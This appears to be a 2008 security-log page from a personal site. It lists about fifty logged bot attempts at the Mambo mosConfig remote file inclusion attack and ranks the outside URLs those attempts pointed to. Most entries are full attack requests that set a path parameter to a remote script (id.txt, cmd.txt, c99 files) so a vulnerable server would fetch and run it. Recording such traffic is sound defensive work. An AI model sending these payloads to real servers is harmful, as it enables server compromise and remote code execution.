Security Issues and Spam

Welcome to Security @ the Pigstye
Monday, December 01 2008 @ 12:18 PM EST

Mambo mosConfig Exploit

The hackers are still trying to exploit the Mambo mosConfig exploit from 2004.

Below is the list of the last 50 attempts to exploit this on the pigstye computers. Of course Mambo has never been used on this network, so all attempts are probably by bots.

Following that is a list of the top 50 destinations for the attempts

DateIPHostAttemptCount
2008-12-01 11:29:08200.155.18.50gizmo.rits.org.brGET /staticpages/index.php/mambomosconfig/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.193
2008-12-01 10:19:5566.160.185.2066.160.185.20GET /staticpages/index.php/mambomosconfig//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.129
2008-12-01 09:29:49190.134.149.59r190-134-149-59.dialup.adsl.anteldata.net.uyGET /lamer.php?order=ip&page=2//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.18
2008-12-01 09:23:0685.214.17.211h278148.serverkompetenz.netGET /staticpages/index.php/mambomosconfig/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bengoerz.net/tst.txt?? HTTP/1.136
2008-12-01 08:55:3378.143.46.138serv38.pro-xhost.comGET /staticpages/index.php/mambomosconfig//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playallsongs.com/install/idomila.txt??? HTTP/1.15
2008-12-01 08:41:0262.48.219.2962.48.219.29GET /staticpages/index.php/mambomosconfig//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.15
2008-12-01 08:30:5683.98.237.208ip5362edd0.speedxs.nlGET /staticpages/index.php/mambomosconfig/print%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://jonyrulz.com/c99/fx29id1.txt? HTTP/1.18
2008-12-01 07:09:0672.52.170.160host.tamm.com.saGET /staticpages/index.php//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.129
2008-12-01 06:54:3466.244.236.243h66-244-236-243.bigpipeinc.comGET /staticpages/index.php//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.150
2008-12-01 06:44:3485.214.47.24stunthuhn.deGET /staticpages/index.php/mambomosconfig//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playallsongs.com/install/idomila.txt??? HTTP/1.110
2008-12-01 06:28:48203.231.35.38203.231.35.38GET /staticpages/index.php/mambomosconfig//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1134
2008-12-01 06:10:01222.122.140.40222.122.140.40GET /staticpages/index.php/mambomosconfig/…//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.115
2008-12-01 05:54:28212.159.7.155ccgi03.plus.netGET /staticpages/index.php/mambomosconfig//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.111
2008-12-01 04:54:40195.137.143.11trading02.tzm.netGET /article.php/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.116
2008-12-01 04:50:27207.178.128.116jupiter.noc.iswest.netGET /staticpages/index.php/mambomosconfig/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.phoenixgc.net/help/bo.do?? HTTP/1.1229
2008-12-01 03:55:3791.192.20.16491.192.20.164GET /staticpages/index.php//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.duvase.com.ar/components/com_joomla/bot.txt?? HTTP/1.19
2008-12-01 03:28:21209.90.77.55cp21.heritagewebdesign.comGET /article.php/20070413095639935/print/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.phoenixgc.net/help/bo.do?? HTTP/1.116
2008-12-01 03:24:0564.38.51.98ksded.caxy.comGET /article.php/20070413095639935/print/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gregolsen.jp/bo.do?? HTTP/1.111
2008-12-01 03:15:5289.111.180.85c137.colo.hc.ruGET /staticpages/index.php/mambomosconfig/print/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.118
2008-12-01 03:05:53201.159.66.178201.159.66.178GET /staticpages/index.php//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.16
2008-12-01 01:57:4574.53.7.2014.7.354a.static.theplanet.comGET /staticpages/index.php/mambomosconfig/print/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.116
2008-12-01 00:47:29201.3.132.147201-3-132-147-paebv300.ipd.brasiltelecom.net.brGET /staticpages/index.php/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.14
2008-11-30 20:41:0682.102.10.26ns1.dnserver.infoGET /staticpages/index.php/mambomosconfig//errors.php?error=http://wolfd.com/joomwolftec1/readme???? HTTP/1.1510
2008-11-30 17:27:2275.145.110.10075-145-110-100-Memphis.hfc.comcastbusiness.netGET /lamer.php?order=ip&page=2%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.135
2008-11-30 15:41:42195.221.254.1castor2.fcomte.iufm.frGET /staticpages/index.php/mambomosconfig/print//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.18
2008-11-30 14:24:51217.27.212.6retek.darkangel.huGET /staticpages/index.php/mambomosconfig/print//home/www/public_html/rgboard/include=http://n0b0dys1t3.iespana.es/cmd.txt???? HTTP/1.145
2008-11-30 13:54:23205.134.240.162ld34.inmotionhosting.comGET /staticpages/index.php/mambomosconfig%20//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://perazimmedia.com/helpdesk/readme.txt???? HTTP/1.15
2008-11-30 13:20:13210.188.201.145sv125.xserver.jpGET /staticpages/index.php/mambomosconfig//errors.php?error=http://n0b0dys1t3.iespana.es/cmd.txt???? HTTP/1.16
2008-11-30 12:29:4582.146.59.116highraiser.comGET /staticpages/index.php/mambomosconfig/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.115
2008-11-30 10:10:0085.114.132.122c122.cyan.fastwebserver.deGET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.turkocagi.org.tr/test.txt? HTTP/1.17
2008-11-30 09:45:57209.85.106.36mail.ritechhosting.comGET /staticpages/index.php/index/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://evy.siteburg.com/ed.txt?? HTTP/1.110
2008-11-30 09:30:0469.50.213.186linkneo.comGET /staticpages/index.php/mambomosconfig/print//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.126
2008-11-30 09:30:03211.171.202.85211.171.202.85GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://gio90.thewomanizer.net/id.txt??? HTTP/1.1117
2008-11-30 07:42:50216.75.35.118su1035118.aspadmin.netGET /staticpages/index.php//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1938
2008-11-30 07:14:3282.135.199.2982-135-199-29.static.zebra.ltGET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.uralitel.ru/en/search/cmd.txt??????? HTTP/1.119
2008-11-30 07:13:28210.222.18.103210.222.18.103GET /staticpages/index.php/mambomosconfig//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.184
2008-11-30 07:07:05124.0.210.117124.0.210.117GET /article.php///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rankdate.com/investigate/phpfox.txt?? HTTP/1.132
2008-11-30 07:05:27222.122.52.80churchtown.treem.co.krGET /article.php///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.110
2008-11-30 06:44:33222.236.47.146222.236.47.146GET /article.php///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.15
2008-11-30 06:30:1783.64.250.242ms02.schabkar.comGET /staticpages/index.php/mambomosconfig%20%20//include/bbs.lib.inc.php?site_path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.111
2008-11-30 05:11:46211.51.221.135211.51.221.135GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.110
2008-11-30 03:55:5765.18.169.40kmc.luckydays.comGET /staticpages/index.php/mambomosconfig/errors.php?error=http://www.diplom.nu/templates_c/id.txt? HTTP/1.143
2008-11-30 01:26:23212.143.3.70ns1.fav.co.ilGET /staticpages/index.php/mambomosconfig//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.112
2008-11-30 01:01:53189.38.57.194colocation.carrosnaserra.com.brGET /staticpages/index.php/mambomosconfig/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.16
2008-11-30 00:47:1082.130.231.243243.82-130-231.dynamic.clientes.euskaltel.esGET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.anboactief.nl/uploads/sfx.txt?? HTTP/1.13
2008-11-30 00:28:49212.108.64.58server2.web.tibus.netGET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.116
2008-11-30 00:28:49212.108.64.58server2.web.tibus.netGET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.116
2008-11-30 00:23:5865.18.192.85wildrivernet4.wildrivernet4.comGET /article.php/20070413095639935/print/components/com_performs/performs.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.117
2008-11-30 00:23:06202.142.223.164202.142.223.164.colo.isp-thailand.comGET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.128
2008-11-29 20:27:2166.7.214.132server.mix-online.orgGET /staticpages/index.php/mambomosconfig//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://forum.happybass.com/idf.txt?? HTTP/1.120
Hack Destination Computers# of Attempts
http://125.250.78.194/rgboard/manual/.../sistem.txt??? 37
http://javva.com/id.txt? 25
http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? 22
http://208.42.97.97/blog/id.gif? 21
http://www.pass100.co.kr/LykBoard/image.gif???? 20
http://220.134.244.157/xoops/templates_c/id3.txt? 20
http://lansites.ru//language/lang_english/test.txt??? 17
http://oursoultvxq.com/bbs/data/vip/id.txt?? 17
http://r00tcrew.webcindario.com/id.txt??? 14
14
http://apai.100megsfree8.com/id.gif? 14
http://lnx.padellino.com/prc.gif? 13
http://apachi.100megsfree8.com/id.gif? 11
http://x0x1.webcindario.com/tst.txt?? 11
http://sfunion.com/echot/data/action/act.txt?? 10
http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? 10
http://apai.net46.net/id.gif? 10
http://www.sexery.de/prc.gif? 9
http://r3df0x.altervista.org/ddoss.txt???? 9
http://pcpinformatica.com.br/fx29id1.txt?? 9
http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? 9
http://www.samilglass.com/images/v6id.txt??? 9
http://motookazja.com.pl/admin/libs/config.txt?? 9
http://store.at.ua/test.txt?? 9
http://www.codeduc.cl/components/id.txt???? 9
http://www.herbsall.4yz.com/images/b?? 9
http://rox4ever.t35.com/TT?? 8
http://markin.siteburg.com/id.txt??? 8
http://www.newminiclub.nl/copyright.txt?? 8
http://ubintu.100megsfree8.com/id.gif? 8
http://www.autosate.ru/images/borda.jpg? 8
http://www.apnic.net/index.html? 8
http://www.dalycityrecords.com/ids.txt?? 8
http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? 8
http://dhcom.co.kr/zboard/id.txt?? 7
http://www.itpro-ua.com/dotproject//images/.bash/id.txt? 7
http://usuarios.lycos.es/zxczxc/id.txt???? 7
http://www.l2reloaded.org/robots.txt??? 7
http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? 7
http://www.ganzkoerperpflege.at/files/oye.txt?? 7
http://www.cdpm3.com/id.txt? 7
http://www.mymudpie.com/dlk/sistem.txt?? 7
http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? 7
http://30stm.dk/v2/error/copyright.txt?? 7
http://dark912.altervista.org/id1.txt? 7
http://www.efnetbr.t35.com/test.txt? 6
http://www.dindondago.it/l333tbi1tX.txt???? 6
http://addictivebehavior.net/h.dat?&list=1&cmd=id 6
http://www.phdcursos.com.br/http/idd.txt? 6
http://www.mykr.net/bbs/id.txt? 6

Last Updated Friday, April 27 2007 @ 03:40 PM EDT|4,649 Hits View Printable Version